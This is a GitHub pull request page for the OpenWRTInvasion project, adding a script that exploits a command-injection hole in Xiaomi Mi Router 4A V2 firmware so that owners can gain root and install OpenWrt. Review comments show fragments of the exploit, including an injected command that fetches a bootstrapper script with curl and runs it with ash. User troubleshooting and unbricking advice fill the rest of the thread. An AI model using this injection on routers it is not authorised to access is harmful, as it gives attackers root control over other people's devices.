-
Notifications
You must be signed in to change notification settings - Fork 280
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Exploit scripts for the V2 of the Router with Firmware 2.30.20 #155
base: master
Are you sure you want to change the base?
Conversation
Testscript not needed
Testscript not needed
@ViceEye your Router IP address should be 192.168.31.1, this is xiaomi default router address. |
I change the Router to extender mode, so it can get online (I don't have long cable yet), before I do this, it was not working too |
@ViceEye seems you are not login to your xiaomi router (192.168.31.1) admin page on a browser before you |
I am logged in, on my browser tho, let me retry. Does {"code": 0} mean successful exploit |
{"code": 0}, --- I donot know this. |
Fixed, found out that WSL cannot do this!!! And this way is working under Windows env, so remove the os check in the script and it's work now |
Wait, you've started the script in the windows linux env? I haven't tried this one tbh. But we are also talking about a VM when I look at the 172.xxx.xxx.xxx address. I remove the os check, not a problem, but with VMs, this would be way harder. |
…g condition if the router starts dropbear fast or slow somehow. The script was extended with logouts into /tmp/exploit.log - the script was executed multiple times in a row without dropping out too soon.
Also, here is the output of a successfull injection:
Above the Telnet should work as soon as you see the download worked of the 2 files and the script ended, even with an error saying ssh is not open. Try telnet. I executed the exploit multiple times in a row, even with a fresh rebooted router. |
Thanks for this 🔥 Couple of things:
|
If the original script had been a class I could use or extend from, that would be no problem. But remember, you access variables of the same instance, when I use access the function, the variable will be empty. And melting everything into one and let people decide is not really a good idea. The users are overwhelmed with the options and setup they have to do right now, knowing which exploit to use would only open more tickets. We could remove your original script, if the other exploit works on older routers too. |
@LordPinhead Unfortunately, I flashed again with the newest SNAPSHOT (r21150-63db906516). @acecilia And now my router starts with a solid orange light and light will be off and on looping forever. IP:192.168.31.1 disappeared. What I guess is that I need to debrick my device. I have tried 1) Mi Wifi Repair tool, 2) TinyPXE4A. Both methods are NOT successfully debrick my device. I have tried different factory firmwae 2.28.xx and 2.18.28.bin. I guess that the bin file needs to be 2.30.20 for V2, however I cannot find any place where I can download this version of firmware. (There is the 3rd method: micky0867 bootp/tftp-server procedure. However, bootp is not found anywhere to download. I could not try this method.) I had realized my stupidity and carelessness cost me a lot of effort trying to save this device. and I had concluded to a point to I need your help. and I believe there will be others who will suffer from the same mistakes. With your help, it will help tremendously! Do you think all I need is actually the 2.30.20.bin file? Any direction I could go? Thank you very much, @LordPinhead @acecilia |
@MrTaiKe well, there are no official OpenWRT builds for this device - you've flashed an unsupported firmware for a different router, and bricked your device. V1 and V2 are different, and firmwares for them are not compatible. And there is no publicly available stock firmware for this device online as far as I know. I hope you have made a full backup of |
@vanyasem Thank you for your reply. I understood V1 and V2 are different. I used @LordPinhead's code (commit #99634522) and successfully flash OpenWrt onto it. OpenWrt 22.03.2 Sysupgrade was actually working on this device except WiFi features were missing. I was dumb enough to think SNAPSHOT might contain wireless package, and flashing with latest snapshot which eventually bricked my device :( OH MY GOD, I do not have any mt0. Do you think I can use someone else's mt0, or I will have to just wait for the stock firmware 2.30.20 made publicly available ? Thank you again |
@MrTaiKe |
@410252889 |
@410252889 非常感謝您的幫助, 您是救世主!! @LordPinhead @vanyasem @acecilia
By the way, this is a great community place! |
@RadioOperator Thank you for pointing out the AC1200/RB02. I have read thru the entire thread of #141. Looks like @wbs306 #141 (comment) compiled a new openwrt firmware for R4AV2. Did anyone try to use @LordPinhead's code (commit #99634522) to flash @wbs306's compiled openwork? @wbs306 would you please point out where I can find your compiled R4AV2 Openwrt? I can test it out. Btw, in spite to the HW difference between V1 and V2, it is very strange to me that I was able to successfully flash R4AV2 device with OpenWrt 22.03.2 Sysupgrade firmware (as I mention earlier) |
you already know using the official build got the wifi problem because of the different chip. |
Sorry that I am a newbie trying to learn many things in a short time. I kind of got what you saying. So assuming or if the major HW difference are just the WiFi chips, then the official build could be modified just the codings for the wireless chips? I am kind of surprised that I was able to flash it. It seems to me that the system had not changed much except the wireless chips. Correct me if I am wrong? Thanks! I am guessing that it might retain most of original R4A Hardware except using the AC1200 wireless chips. |
I was offline for some time because I moved into a new home, but I simply moved the script into the original one. The exploit works on every version, even old ones, so it's not wrong. I exploited 8 routers successfully, 2 with real old firmware versions. |
I really appreciate the amount of work that you guys put in to this project to get the most out of this router. so thank you all for that. but only if the device had a usb port my router would be functional now😁 |
router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address | ||
|
||
# get stok | ||
sys.exit("Stopping: script can only be run on a Mac/Linux system") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is this intentional? Windows support is being dropped again?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you have a Windows system, remove the code and try it. I have no Windows that was working with it, and when I have to give it to somebody without much knowledge, a live disk in VMWare would be easier.
@@ -50,7 +67,8 @@ def get_stok(router_ip_address): | |||
return None | |||
key = re.findall(r'key: \'(.*)\',', r0.text)[0] | |||
nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000)) | |||
router_password = input("Enter router admin password: ") | |||
router_password = "12345678" | |||
router_password = input("Enter router admin password: '{}']: ".format(router_password)) or router_password |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
What is this hardcoded password?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's not "hardcoded" - it's initialized and a user could change it. I used 12345678 for the tests and with the placeholder, I did not have to enter it all the time.
exploit_cmd += "curl -s http://{}:{}/bootstrapper_v2.sh > bootstrapper.sh && ".format(hosting_ip, http_port_number) | ||
exploit_cmd += "/bin/ash /tmp/bootstrapper.sh".format(hosting_ip, http_port_number, hosting_ip, http_port_number) | ||
|
||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
[detail] Double blank line
|
||
if checkHost(router_ip_address, 22): | ||
print("done! Now you can connect to the router using several options: (user: root, password: root)") | ||
print("* telnet {}".format(router_ip_address)) | ||
print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address)) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why is oHostKeyAlgorithms=+ssh-rsa
gone?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why is it needed in the first place? The ssh client does the handshake and got the right cipher and algorithms.
`
debug1: Remote protocol version 2.0, remote software version dropbear
debug1: compat_banner: no match: dropbear
debug1: Authenticating to hella:22 as root
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: [email protected] MAC: compression: none
debug1: kex: client->server cipher: [email protected] MAC: compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:vFou7A4lAJIvzCPMb1ds1Eve7pMZ2z4YNDGTpz48S+4
debug1: Host hella is known and matches the ED25519 host key.
`
发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址: http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin 2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh |
小米路由器4A千兆版v2(r4ag v2)官方snapshots固件可以用, 但是5g wifi只有3db, 改几次5g参数WiFi就会消失需要重启路由器. |
this exploit doesn't work on r4acv2, but the current one does. it'd be incorrect to completely replace the current exploit |
whene I use this exploit only by input the stock adreess ( dose'nt work by ip address) , that show every thing is corect , but i could not conect by cyber to upload openwrt image to my router to continue the process |
hi bro can you discibe that how ? |
This is something I could not find out why this happens. Sometimes, the Dropbear SSH Server takes too long to start and even with a pause of 3 minutes, the connection was unsuccessful. But with the second time it works. Even on a shell I couldn't see why it behaves like this.
But I have the V2 and it worked. 3 of them and they had the 2.30.20 Firmware with the exploit. If you have a newer one in which this one is fixed and the other one works, my first one would be the best option, even when the code is doubled. Or somebody has the time to make modules and remove the double code from the scripts, I don't have it. |
My R4A gigabite edition flash is Winboard 250128JVSQ |
that's r4a gigabit (r4av2?), and i have the regular r4a (r4acv2) |
lastly I can do it |
Device is the same as Xiaomi Mi Router 4A Gigabit, except of: - 5G WiFi is MT7663 - addresses of leds, wifi and eth ports are slightly changed Specs: SoC: MT7621 CPU: 2 x 880 MHz ROM: 16 MB RAM: 128 MB WLAN: MT7603, MT7663 MAC addresses: WAN **** factory 0xe006 (label) LAN *:f7 factory 0xe000 2.4 GHz *:f8 factory 0x0000+0x4 (mtd-eeprom+0x4) 5 GHz *:f9 factory 0x8000+0x4 (mtd-eeprom+0x4) Installation: Factory firmware is based on a custom OpenWrt 17.x. Installation is the same as for Xiaomi Mi Router 4A Gigabit. Probably the easiest way to install is to use the script from this repository: acecilia/OpenWRTInvasion#155 In a more advanced case, you can do everything yourself: - gain access to the device through one of the exploits described in the link above - upload sysupgrade image to /tmp - overwrite stock firmware: # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1 Recovery: Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit. Possible options can be found here: https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition One of the ways is to use another router with OpenWrt: - connect both routers by their LAN ports - download stock firmware from [1] - place it inside /tmp/test.bin on the main router - configure PXE/TFTP on the main router - power off 4Av2, hold Reset button, power on - as soon as image download via TFTP starts, Reset can be released - blinking blue wan LED will indicate the end of the flashing process, now router can be rebooted [1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin Signed-off-by: Dmitry Sokolov <[email protected]> (cherry picked from commit 39e4f03)
hello everyone . I have R4AGv2 with 2.30.25 firmware . How can I install openwrt on my router ? is this possible or not because in openwrt site I see this : Warning 10/2022 Xiaomi is currently shipping v2 of the 4A Gigabit Edition, it's identifiable by fw version 2.30.20, and the name when assigned an IP from a DHCP (not your ISPs) via the WAN port, MiWiFi-R4AV2. This model cannot be flashed with Openwrt. |
特别感谢 @kokutoukiritsugu ,用这个方法,成功解锁 telnet/ssh,需要严格按阁下提供的操作步骤,我的步骤如下,供大家参考
|
Just a really important information, I received a device with 2.30.500 and don't work not matter what, I see the default DHCP range was changed to use high port, change to use this and you are good to go: Maybe make sense to verify the machine IP and show a warning?
|
@webysther's suggestion (changing DHCP pool) combined with using LordPinhead's latest worked perfectly on the exploit side. Weirdly, ftp refused to let me push the firmware to /tmp, but I was able to get in via telnet and then wget the payload instead. |
Great! About FTP, for me only works telnet also. |
2024.7.21 Mi Router 4 Gigabit Version 2, Firmware version 2.30.500 works. |
Issue: SSH connection not working after script execution Hi, I’m experiencing issues when trying to run the OpenWRT Invasion script on my Xiaomi Mi Router 4A Gigabit Edition (Firmware version 2.30.500). After executing the script, I receive the following message: `dmitrybelyakov@dmitry-5 OpenWRTInvasion % python3 remote_command_execution_vulnerability.py
router_ip_address: miwifi.com start uploading config file...
I've tried using Telnet, but I'm getting "Connection refused". Does anyone have any advice on how to resolve this, or is there something specific I should check with my router's firmware version? Thanks for your help! |
@DmitryBLKV have you tried running the script again? In my case that helped and on the next iteration it worked. |
Unfortunately this is patched for 3.0.129 on Xiaomi 4A (Global)
|
Setup I used is router IP 192.168.31.1, computer IP 192.168.31.2, Password for the webinterface is 12345678, these are the default values.
The exploit is based on vanyasem (#141 (comment)) findings and his comment in issue 141.
Start remote_command_execution_vulnerability_v2.py with python3, this will ask for the router ip, the local ip and the webinterface password (default values are set), then it will pack a payload like before, a bootstrapper and it will be injected into the set_config_iotdev url. Basically, remote code execution.
It needs the dropbear and busybox executable plus the script. Because it was so different, I made a new python script and a new bash script.
Now, with root access, the router is also open for OpenWRT.